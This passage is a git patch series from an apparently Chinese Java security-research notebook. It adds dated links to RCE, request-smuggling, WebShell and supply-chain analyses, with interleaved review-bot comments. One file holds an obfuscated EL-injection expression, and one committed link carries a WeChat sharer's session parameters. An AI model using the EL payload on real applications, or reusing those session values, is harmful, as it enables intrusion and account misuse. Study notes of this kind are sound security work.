@@ -189,3 +189,4 @@ + 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) + 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) + 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) ++ 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) From 6443c0b76762056b6cf3892ebe727fd9aafd25b0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 2 Nov 2022 17:43:12 +0800 Subject: [PATCH 177/332] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index afcf094..e2e39f6 100644 --- a/README.md +++ b/README.md @@ -23,7 +23,7 @@ + 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚 + 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚 + 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚 -+ 2022/10/07 [添加JDK里面的trick](JDK) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加JDK里面的trick](Jdk) 💛 💙 💜 ❤️ 💚 From ed0de079fba2b2ebbd62fcd7b614fed062fc40d1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 3 Nov 2022 17:18:16 +0800 Subject: [PATCH 178/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7ce9d99..fbe1161 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -190,3 +190,4 @@ + 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) + 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) + 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) ++ 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) 
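Review bot: in `apache storm/Readme.md` (PATCH 168/332), the setup one-liner puts `nohup` in front of `bash storm dev-zookeeper` only; `nimbus`, `supervisor`, `ui` and `logviewer` are backgrounded with a plain `&`, and all five are launched at once with no wait for ZooKeeper to come up. Suggest one `nohup ... &` line per daemon, in start order, with output redirected to a log file. The closing remark that deserialization did not reproduce on 2.1.0 would be more useful with the affected version range from the linked analyses next to it.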
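Review bot: in `wso2/Readme.md` (PATCH 171/332), the heading `路径匹配处理类` is followed only by two screenshots with the alt text `image`, so the class the note is about never appears as text and cannot be searched, or read at all if the image host is unavailable. Suggest naming the class and the relevant method in a line of text, and under `### fix` pointing each of the two items (added authentication, validation of the upload path) at the corresponding change in the linked carbon-kernel commit.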
From e686af6a063a976db62edd139ee49895e4458fc1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 19:08:20 +0800 Subject: [PATCH 179/332] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 63f06c2..34fce36 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -28,3 +28,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** + 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** + 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据** ++ 2022/11/06 [【干货分享】五分钟教你挖掘小程序漏洞](https://mp.weixin.qq.com/s/95YiN8XJLGPUS5ykBUsmAg【干货分享】五分钟教你挖掘小程序漏洞) **小程序挖掘** From dfcc57324dd22bee09bdfa5b42232ea4e5b40f69 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:53:37 +0800 Subject: [PATCH 180/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index fbe1161..a138ee1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -191,3 +191,4 @@ + 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) + 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) + 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) ++ 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 From 05dd9a6d4812c96a7f2a0a5efc813d4d2ecd1927 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 21:29:45 +0800 Subject: [PATCH 181/332] Update Readme.md --- shell/EL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index 66df221..dfd1a79 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -45,3 +45,5 @@ https://forum.butian.net/share/1880 ```java ${""[param.a]()[param.b](param.c)[param.d]()[param.e](param.f)[param.g](param.h)} ``` + +https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html From 5b42040b3cdf4f8167f5a54026170aa85b8a4589 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 21:31:46 +0800 Subject: [PATCH 182/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a138ee1..54be93c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -192,3 +192,4 @@ + 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) + 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) + 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 ++ 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** From 05d5ae707ee8744edd830bafc3ee2e7f10cdfb31 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 8 Nov 2022 00:15:20 +0800 Subject: [PATCH 183/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 54be93c..857b71e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -193,3 +193,4 @@ + 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) + 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 + 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** ++ 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) From cfff1e6afcf4ff447b456036ca4a445b6459b0a7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 9 Nov 2022 13:08:37 +0800 Subject: [PATCH 184/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 857b71e..cb6d354 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -194,3 +194,4 @@ + 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 + 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) ++ 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** From 98b3345681289c1b407d99630769741bc5b12221 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 9 Nov 2022 13:18:21 +0800 Subject: [PATCH 185/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cb6d354..a119bff 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -195,3 +195,4 @@ + 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** ++ 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From fafb5256e118e107cd4bce89a584e531465fb42a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 10 Nov 2022 16:15:53 +0800 Subject: [PATCH 186/332] Create CVE-2021-33037.md --- tomcat/Smuggling/CVE-2021-33037.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 tomcat/Smuggling/CVE-2021-33037.md diff --git a/tomcat/Smuggling/CVE-2021-33037.md b/tomcat/Smuggling/CVE-2021-33037.md new file mode 100644 index 0000000..7905c08 --- /dev/null +++ b/tomcat/Smuggling/CVE-2021-33037.md @@ -0,0 +1,4 @@ +Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析 + + +[Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析](https://xz.aliyun.com/t/9866) From 4c3c193f5a638d7a02dfbddc24cd0a7ea74a3cd7 Mon Sep 17 00:00:00 2001 
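Review bot: in PATCH 179/332, the link target of the added 2022/11/06 entry has the article title appended to it (`.../s/95YiN8XJLGPUS5ykBUsmAg【干货分享】五分钟教你挖掘小程序漏洞`), so the rendered link will not resolve to the article. The target should end at the article id, with the title kept only inside the square brackets.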
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 10 Nov 2022 21:43:42 +0800 Subject: [PATCH 187/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a119bff..6f37201 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -196,3 +196,4 @@ + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true** From 55c1eb7eb95ba9523c46bef809589a2fa0deffcb Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 10 Nov 2022 21:47:47 +0800 Subject: [PATCH 188/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6f37201..f24bd56 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -196,4 +196,4 @@ + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) -+ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true** ++ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** From 07720c45c22bba5002bf9d3a7623725d59d8ef80 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 11 Nov 2022 11:37:18 +0800 Subject: [PATCH 189/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f24bd56..59bfd5f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -197,3 +197,4 @@ + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** ++ 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) From 66cf07e40861319e9496f869f5f0bc076b502ca9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 11 Nov 2022 21:25:47 +0800 Subject: [PATCH 190/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 59bfd5f..3622e3f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -198,3 +198,4 @@ + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** + 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) ++ 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** From bcf52de768f34a5ec4346883ab62bf23d041ffb3 Mon Sep 17 00:00:00 2001 
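Review bot: in PATCH 190/332, the link added for the 2022/11/11 Navicat entry carries the full WeChat share query string, including `key=`, `uin=`, `pass_ticket=` and `exportkey=` values that look like they come from the sharer's own client session. Those do not belong in a public repository; the `__biz`, `mid`, `idx` and `sn` parameters are enough to identify the article, and other entries in this file already use the short `/s/<id>` form.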
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 11 Nov 2022 22:14:44 +0800 Subject: [PATCH 191/332] Create CVE-2022-42252.md --- tomcat/Smuggling/CVE-2022-42252.md | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 tomcat/Smuggling/CVE-2022-42252.md diff --git a/tomcat/Smuggling/CVE-2022-42252.md b/tomcat/Smuggling/CVE-2022-42252.md new file mode 100644 index 0000000..5430463 --- /dev/null +++ b/tomcat/Smuggling/CVE-2022-42252.md @@ -0,0 +1,3 @@ +https://www.xujun.org/note-154484.html + +![image](https://user-images.githubusercontent.com/63966847/201358116-b7c2e4de-0c57-461d-86b5-d370b62a5b6d.png) From a392d241bbc1fefb6197ebdced6b47fe756aa16b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 13 Nov 2022 02:01:59 +0800 Subject: [PATCH 192/332] Update Readme.md --- .../Velocity/Readme.md" | 5 +++++ 1 file changed, 5 insertions(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index f6c05c2..9c7d898 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -4,3 +4,8 @@ Confluence CVE-2019-3396 Jira CVE-2019-11581 +框架中的利用: + +https://xz.aliyun.com/t/11832 + +配合了fastjson 反序列化生成对象之后调用方法 From 6128099756ad6c518f98e7908731b72dcd2b4a70 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 19 Nov 2022 18:16:19 +0800 Subject: [PATCH 193/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3622e3f..225f958 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -199,3 +199,4 @@ + 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** + 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) + 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** ++ 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) From fa2f01f0e301bd8a36604eed063be0a3c9424286 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 19 Nov 2022 18:21:19 +0800 Subject: [PATCH 194/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
